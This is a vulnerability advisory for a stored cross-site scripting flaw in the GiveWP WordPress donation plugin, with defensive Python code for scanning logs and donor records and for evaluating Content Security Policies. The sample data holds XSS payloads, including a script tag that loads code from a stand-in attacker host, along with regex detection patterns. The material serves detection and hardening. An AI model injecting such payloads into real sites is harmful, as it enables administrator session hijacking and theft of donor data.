CVE-2025-13206

GiveWP · GiveWP – Donation Plugin and Fundraising Platform

A high-severity vulnerability has been identified in the GiveWP – Donation Plugin and Fundraising Platform for WordPress.

Executive summary

CVE-2025-13206 is a high-severity stored cross-site scripting (XSS) vulnerability in the GiveWP – Donation Plugin and Fundraising Platform for WordPress. It lets an attacker store a malicious script on the site that later runs in the browsers of users who view the affected page, including administrators. Successful exploitation could lead to theft of sensitive user data, compromise of administrator accounts and, through a hijacked administrator session, a complete takeover of the affected website.

Vulnerability

The vulnerability is a stored cross-site scripting (XSS) flaw. An unauthenticated attacker can submit a script payload in the 'name' parameter of a form handled by the plugin. Because the plugin does not properly sanitize this input before storing it in the database, the payload is saved as submitted. When an administrator or other user later views the page that displays the stored value, the browser interprets it as markup rather than text and the script executes in that user's session, with the same origin, cookies and privileges as the victim. In an administrator's session that is enough to perform any action the administrator can, without the attacker ever holding credentials. Unlike reflected XSS, no victim interaction with an attacker-supplied link is needed; the payload waits in the database until someone views it. The standard defence against this class of flaw is to sanitize the value on input and escape it for its output context when it is rendered.

Business impact

This vulnerability is rated High severity with a CVSS score of 7.2. A successful exploit could have significant business consequences, including reputational damage from a compromised donation platform, theft of donors' personally identifiable information (PII), and potential financial fraud. If an attacker hijacks an administrator's session, they could gain full control of the WordPress site, allowing them to deface the website, install backdoors, or use the web server as a foothold to reach other systems on the network.

Remediation

Immediate Action: Update the GiveWP – Donation Plugin and Fundraising Platform plugin to the latest version published by the vendor, which addresses this vulnerability, on every site that runs it, including staging and rarely visited sites. If the plugin is no longer essential for business operations, deactivate and uninstall it to reduce the attack surface; deactivating alone leaves the plugin's code on disk. Updating prevents new injections, but whether payloads already stored in the database remain dangerous depends on where the fix is applied, so review stored donor records after patching.

Proactive Monitoring: Monitor requests to plugin-related endpoints whose 'name' parameter contains script tags, event-handler attributes or suspicious encoded sequences. Note that standard web server access logs record only the request line (method, path and query string), not POST bodies, so a payload submitted in a form body will not appear there; capture it with WAF or ModSecurity audit logging, or with application-level request logging. Regularly audit stored donor records for script fragments, decoding URL and HTML-entity encoding before matching so that encoded payloads are not missed. A Web Application Firewall (WAF) should be configured to detect and block common XSS patterns, with the understanding that pattern matching can be evaded and is a detection signal rather than a guarantee.
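The detection and audit logic described above, as an added example for this advisory rather than GiveWP's or any vendor's code. The log lines, endpoint names (the "give" marker is assumed from the plugin's slug) and donor records are constructed for illustration, and the indicator patterns are deliberately short; the point is the decoding step, which catches payloads that single-pass filters miss, and the reminder that an access-log scan only ever sees query-string parameters.

```python
"""Scan for stored-XSS indicators in request parameters and stored values.

Added example for this advisory; it is not GiveWP's code. The log lines,
endpoint names and donor records below are constructed for illustration.
"""
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Indicators of script injection, applied after decoding. Illustrative, not
# exhaustive: pattern lists can be evaded, so treat a hit as a lead to review.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),                                           # <script ...>
    re.compile(r"<\s*(?:img|svg|iframe|body|input|a)\b[^>]*\bon\w+\s*=", re.I),  # <img onerror=...>
    re.compile(r"javascript\s*:", re.I),                                         # href="javascript:..."
]

# Apache/nginx combined log format. Only the request line is recorded, so this
# scan can see parameters in the query string but never in a POST body.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of URL and HTML-entity encoding.

    Attackers stack encodings (%253C -> %3C -> <, &lt; -> <) to slip past
    naive filters; decoding until the value stops changing defeats that.
    """
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(value: str) -> bool:
    """True if the decoded value matches any XSS indicator."""
    decoded = normalize(value)
    return any(p.search(decoded) for p in XSS_PATTERNS)


def scan_access_log(lines, plugin_markers=("give",), param="name"):
    """Return (client_ip, request_target) for POSTs to plugin-related URLs
    whose query-string `param` carries an XSS indicator.

    `plugin_markers` are substrings expected in the path or query of the
    plugin's endpoints; "give" is assumed here from the plugin's slug.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        parts = urlsplit(m["target"])
        haystack = (parts.path + "?" + parts.query).lower()
        if not any(marker in haystack for marker in plugin_markers):
            continue
        # parse_qs removes one layer of URL encoding; normalize() handles the rest
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if is_suspicious(value):
                hits.append((m["ip"], m["target"]))
                break
    return hits


def audit_stored_values(rows):
    """Return ids of stored records (e.g. donor names read back from the
    database) whose value decodes to an XSS indicator, for manual review."""
    return sorted(row_id for row_id, value in rows.items() if is_suspicious(value))


# Constructed access-log lines (not from a real server).
LOG_LINES = [
    '203.0.113.7 - - [12/Nov/2025:10:01:22 +0000] "POST /wp-admin/admin-ajax.php?action=give_example&name=Alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Nov/2025:10:02:03 +0000] "POST /wp-admin/admin-ajax.php?action=give_example&name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Nov/2025:10:02:41 +0000] "POST /donate/?give_action=x&name=%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(1)%26gt%3B HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Nov/2025:10:03:00 +0000] "GET /wp-admin/admin.php?page=give-example&name=%3Cscript%3E HTTP/1.1" 200 512',
    '198.51.100.5 - - [12/Nov/2025:10:03:30 +0000] "POST /wp-login.php?name=%3Cscript%3E HTTP/1.1" 200 512',
]

# Constructed donor records as they might be read back from the database.
STORED_NAMES = {
    1: "Alice Example",
    2: "O'Brien",                                        # legitimate punctuation, must not be flagged
    3: "<script src=//attacker.example/x.js></script>",  # classic stored payload
    4: "&lt;svg onload=alert(1)&gt;",                    # entity-encoded; revived if decoded before output
}

if __name__ == "__main__":
    for ip, target in scan_access_log(LOG_LINES):
        print(f"suspicious request from {ip}: {target}")
    print("stored records to review:", audit_stored_values(STORED_NAMES))
```

Run against the constructed input, the scan flags the two POSTs from 203.0.113.9 (one plainly URL-encoded, one hidden behind an extra layer of HTML entities) and ignores the GET and the unrelated wp-login.php request; the audit returns records 3 and 4 and leaves the apostrophe in "O'Brien" alone. The same `is_suspicious` check can be pointed at values pulled from WAF audit logs or application logs, which is where body parameters actually show up.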

Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with strict rules to filter XSS payloads on the plugin's endpoints. A Content Security Policy (CSP) can further limit the impact by restricting where scripts may be loaded from, but only if the script-src directive does not allow 'unsafe-inline' and does not allow-list broad sources such as https:, since a stored payload is itself inline script and can otherwise load a second stage from any permitted host. WordPress core and many plugins rely on inline scripts in wp-admin, so a strict policy there frequently breaks functionality; roll it out with Content-Security-Policy-Report-Only first and watch the violation reports. Treat both controls as defence in depth, not a substitute for the update.
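To make the CSP caveat concrete, the following added example (not code from GiveWP, WordPress or this advisory's author) models how a browser decides whether an injected script may run under a given policy, and compares a weak policy with a corrected one. The site origin, hostnames and nonce are constructed; the model covers host, scheme, 'self', 'unsafe-inline', nonce and hash sources in script-src with default-src as fallback, and deliberately omits 'strict-dynamic' and path matching.

```python
"""Evaluate whether a Content-Security-Policy would stop a stored-XSS payload.

Added example for this advisory, not GiveWP's or WordPress's code. The policies,
site origin and hostnames are constructed; the model covers script-src /
default-src host, scheme, 'self', 'unsafe-inline', nonce and hash sources and
omits 'strict-dynamic' and path matching.
"""
from urllib.parse import urlsplit

SITE_ORIGIN = "https://donate.example.org"  # assumed protected site

# Weak: 'unsafe-inline' lets the stored <script> run, and the https: scheme
# source lets it pull a second stage from any https host.
WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' https:"

# Corrected: inline script only with the per-response nonce, external script
# only from one allow-listed CDN (hypothetical host).
STRICT_POLICY = (
    "default-src 'self'; "
    "script-src 'self' 'nonce-r4nd0mN0nce' https://cdn.example.net; "
    "object-src 'none'; base-uri 'self'"
)


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy: dict):
    """script-src governs scripts; default-src is the fallback; None = unrestricted."""
    return policy.get("script-src", policy.get("default-src"))


def allows_inline_script(policy: dict) -> bool:
    """Would an injected <script>...</script> without a nonce execute?"""
    sources = script_sources(policy)
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    # CSP Level 2+: a nonce or hash source makes browsers ignore 'unsafe-inline',
    # so attacker-supplied inline script (which cannot know the nonce) is blocked.
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered
    )
    return "'unsafe-inline'" in lowered and not has_nonce_or_hash


def _host_source_matches(src: str, url) -> bool:
    """Match a host-source such as https://cdn.example.net or *.example.net (no path matching)."""
    if "://" in src:
        scheme, _, rest = src.partition("://")
        if scheme != url.scheme:
            return False
    else:
        rest = src
    host = rest.split("/", 1)[0].split(":", 1)[0]  # drop any path and port
    if host.startswith("*."):
        return url.hostname.endswith(host[1:])
    return host == url.hostname


def allows_external_script(policy: dict, script_url: str, site_origin: str = SITE_ORIGIN) -> bool:
    """Would <script src=script_url> load under this policy?"""
    sources = script_sources(policy)
    if sources is None:
        return True
    url = urlsplit(script_url)
    script_origin = f"{url.scheme}://{url.netloc}".lower()
    for src in sources:
        s = src.lower()
        if s == "*":
            return True
        if s == "'self'":
            if script_origin == site_origin.lower():
                return True
            continue
        if s.startswith("'"):          # 'none', 'unsafe-inline', nonces, hashes: grant no host
            continue
        if s.endswith(":"):            # scheme-source such as https:
            if s == url.scheme + ":":
                return True
            continue
        if _host_source_matches(s, url):
            return True
    return False


def evaluate(policy_header: str, site_origin: str = SITE_ORIGIN) -> dict:
    """Summarize what a stored payload could still do under the policy."""
    policy = parse_csp(policy_header)
    return {
        "inline_payload_runs": allows_inline_script(policy),
        "attacker_host_script_runs": allows_external_script(policy, "https://attacker.example/x.js", site_origin),
        "allowed_cdn_script_runs": allows_external_script(policy, "https://cdn.example.net/lib.js", site_origin),
    }


if __name__ == "__main__":
    for name, header in (("weak", WEAK_POLICY), ("strict", STRICT_POLICY)):
        print(name, evaluate(header))
```

Under WEAK_POLICY every check comes back True: the payload runs inline and can load from any https host, so the policy adds nothing against this vulnerability. Under STRICT_POLICY the inline payload and the attacker-hosted script are both refused while the allow-listed CDN still works. The price of that protection is that every legitimate inline script on the page must carry the nonce, which is exactly why a strict policy on wp-admin tends to break things and should start in report-only mode.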

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high severity (CVSS 7.2) and the potential for complete site compromise, organizations should prioritize applying the GiveWP security update across all websites that run the plugin. Although this vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog and no public exploit is reported, its presence in a widely used fundraising plugin and its unauthenticated attack path make it an attractive target for opportunistic attackers. Prompt patching is the most effective defense against exploitation and the resulting data breaches or reputational harm.